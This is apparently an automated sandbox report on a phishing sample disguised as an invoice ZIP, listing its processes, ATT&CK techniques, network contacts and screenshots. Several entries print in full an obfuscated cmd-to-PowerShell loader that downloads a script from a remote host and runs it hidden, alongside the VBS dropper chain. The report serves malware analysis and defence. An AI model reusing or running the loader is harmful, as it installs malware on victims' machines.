Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 5310000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeWindow / User API: threadDelayed 661Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeWindow / User API: threadDelayed 9337Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3301Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6526Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788Thread sleep count: 661 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788Thread sleep time: -330500s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788Thread sleep count: 9337 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788Thread sleep time: -4668500s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep count: 3301 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep count: 6526 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6920Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 0000000B.00000002.2832972295.000000000583F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxX
Source: wscript.exe, 0000000B.00000002.2832972295.0000000005875000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2833107787.00000132FE02B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2834598614.00000132FF653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: cmd.exe, 00000009.00000003.2175375920.0000000003390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: wscript.exe, 0000000B.00000002.2832972295.000000000583F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: svchost.exe, 00000011.00000002.2833018847.00000132FE013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 54.39.128.117 443Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($untewvun) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($untewvun) "
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($untewvun) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($untewvun) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting		Valid Accounts11
Command and Scripting Interpreter		1
Browser Extensions		111
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		111
Scripting		1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		1
DLL Side-Loading		1
Extra Window Memory Injection		41
Virtualization/Sandbox Evasion		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Extra Window Memory Injection		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637352 Sample: faktura_FV2025020660849.htm_ Startdate: 13/03/2025 Architecture: WINDOWS Score: 96 51 s4.histats.com 2->51 53 filehost200885.info 2->53 67 Found suspicious ZIP file 2->67 69 Detected javascript redirector / loader 2->69 71 Downloads suspicious files via Chrome 2->71 73 6 other signatures 2->73 11 chrome.exe 14 2->11         started        15 svchost.exe 1 2 2->15         started        17 chrome.exe 2->17         started        signatures3 process4 dnsIp5 61 192.168.2.7, 13621, 138, 443 unknown unknown 11->61 49 C:\...\faktura_FV2025020660849.zip (copy), Zip 11->49 dropped 19 unarchiver.exe 4 11->19         started        21 chrome.exe 11->21         started        63 127.0.0.1 unknown unknown 15->63 file6 process7 dnsIp8 24 cmd.exe 2 2 19->24         started        27 7za.exe 2 19->27         started        55 s4.histats.com 149.56.240.132, 443, 49692 OVHFR Canada 21->55 57 filehost200885.info 156.229.228.198, 13621, 49693, 49694 ONL-HKOCEANNETWORKLIMITEDHK Seychelles 21->57 59 2 other IPs or domains 21->59 process9 file10 79 Wscript starts Powershell (via cmd or directly) 24->79 81 Obfuscated command line found 24->81 30 wscript.exe 14 24->30         started        34 conhost.exe 24->34         started        47 C:\Users\user\AppData\...\2025020665304.vbs, ASCII 27->47 dropped 36 conhost.exe 27->36         started        signatures11 process12 dnsIp13 65 54.39.128.117, 443, 49705 OVHFR Canada 30->65 83 System process connects to network (likely due to code injection or exploit) 30->83 85 Wscript starts Powershell (via cmd or directly) 30->85 87 Obfuscated command line found 30->87 89 2 other signatures 30->89 38 cmd.exe 1 30->38         started        signatures14 process15 signatures16 75 Wscript starts Powershell (via cmd or directly) 38->75 77 Obfuscated command line found 38->77 41 powershell.exe 15 17 38->41         started        43 conhost.exe 38->43         started        45 cmd.exe 1 38->45         started        process17

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/faktura_FV2025020660849.html0%Avira URL Cloudsafe
https://s4.histatss$%0%Avira URL Cloudsafe
https://s4.histats.%0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
filehost200885.info
156.229.228.198
truefalse
    		unknown
    s4.histats.com
    		149.56.240.132
    		truefalse
      		high
      www.google.com
      		172.217.18.4
      		truefalse
        		high
        _13621._https.filehost200885.info
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://s4.histats.com/stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_openedfalse
            		high
            file:///C:/Users/user/Desktop/faktura_FV2025020660849.htmltrue
            • Avira URL Cloud: safe
            		unknown
            https://s4.histats.com/stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2false
              		high
              NameSourceMaliciousAntivirus DetectionReputation
              https://g.live.com/odclientsettings/Prod1C:qmgr.db.17.drfalse
                		high
                https://histats.com/d_opened=wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://s4.histats.com/stat8%wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000011.00000003.1207118522.00000132FF4E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drfalse
                      		high
                      https://s4.histats.com/statswscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://s4.histatss$%wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.ver)svchost.exe, 00000011.00000002.2834516229.00000132FF600000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://s4.histats.com/staswscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://histats.com/d_openedmwscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://histats.com/d_opened8%wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://s4.histats.com/wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://s4.histats.com/cwscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://s4.histats.%wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://histats.com/d_openedwscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://histats.com/d_opened=%wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://s4.histats.com/stats/0.php?4935988&wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2832180699.00000000038B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.000000000340A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.56.240.132
                                          		s4.histats.comCanada
                                          		16276OVHFRfalse
                                          172.217.18.4
                                          		www.google.comUnited States
                                          		15169GOOGLEUSfalse
                                          156.229.228.198
                                          		filehost200885.infoSeychelles
                                          		139086ONL-HKOCEANNETWORKLIMITEDHKfalse
                                          54.39.128.117
                                          		unknownCanada
                                          		16276OVHFRtrue

                                          Private

                                          IP
                                          192.168.2.7
                                          127.0.0.1

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1637352
                                          Start date and time:2025-03-13 14:55:55 +01:00
                                          Joe Sandbox product:CloudBasic
